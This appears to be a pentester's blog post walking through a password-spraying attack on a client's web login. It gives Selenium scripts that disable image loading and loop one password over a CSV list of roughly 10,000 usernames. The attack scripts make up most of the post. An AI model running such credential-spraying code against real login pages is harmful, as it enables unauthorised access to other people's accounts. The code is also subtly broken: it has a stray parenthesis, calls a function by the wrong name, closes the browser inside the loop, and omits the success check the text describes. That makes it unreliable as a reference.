Recently I faced a situation where I had to conduct password spraying attack for a client. The login page didn't have any Captcha, and all it had was a heavy Background image, a logo and a simple login form consisting of two input fields and a submit button. Looks easy. That is what I thought. However, soon I realised that there were other hidden input fields and even the parameter names of the visible input fields were changing. There were several HTTP requests involved in one single login.

Since I had a deadline, I decided to give selenium a go. Till this point I had only heard of selenium and never actually used it.

A quick Google search of How to submit a form using selenium gave me a boilerplate to start with.


from selenium import webdriver

driver = webdriver.Chrome()
driver.get('https://your-target-url-here.com')
	 
driver.find_element_by_id("username").send_keys("detrapdoor"))
driver.find_element_by_id("password").send_keys("Sup3rS3cr3tp@ssw0rD")

# Click the login button
driver.find_element_by_id("Log_On").click()
driver.close()

However there were around 10,000 email addresses to test out. To make the process more efficient I decided to disable the images as they were taking a huge portion of the bandwidth. To disable the loading of images I added to following code at the top

from selenium import webdriver

option = webdriver.ChromeOptions()
chrome_prefs = {}
option.experimental_options["prefs"] = chrome_prefs
chrome_prefs["profile.default_content_settings"] = {"images": 2}
chrome_prefs["profile.managed_default_content_settings"] = {"images": 2}

driver = webdriver.Chrome(chrome_options=option)

The next problem statement was, how to detect if the login was successful. This was pretty basic. Single Google search revealed that the HTTP response can be played with using driver.page_source after the submit button was clicked. A simple if "incorrect" in driver.page_source" condition did the trick.

At this point, all that was left to do was wrap the initial code in a function definition and run it in a loop after reading through my list of email address.

The final code looked something like this.

from selenium import webdriver

option = webdriver.ChromeOptions()
chrome_prefs = {}
option.experimental_options["prefs"] = chrome_prefs
chrome_prefs["profile.default_content_settings"] = {"images": 2}
chrome_prefs["profile.managed_default_content_settings"] = {"images": 2}

driver = webdriver.Chrome(chrome_options=option)

password = "PASSWORD123!"

def spray_and_pray(username,password):
	driver.get('https://your-target-url-here.com')
		 
	driver.find_element_by_id("username").send_keys(str(username))
	driver.find_element_by_id("password").send_keys(str(password))

	# Click the login button
	driver.find_element_by_id("Log_On").click()
	driver.close()


with open("userdatalist.csv","r") as f:
	for line in f.readlines():
		try:
			spray_Myapp(line.split(',')[0],password)
		except:
			# just in case some entry causes an exception
			pass

Within a few hours it exhausted the username list and gave a few positives to work with.

Reach out to me @detrapdoor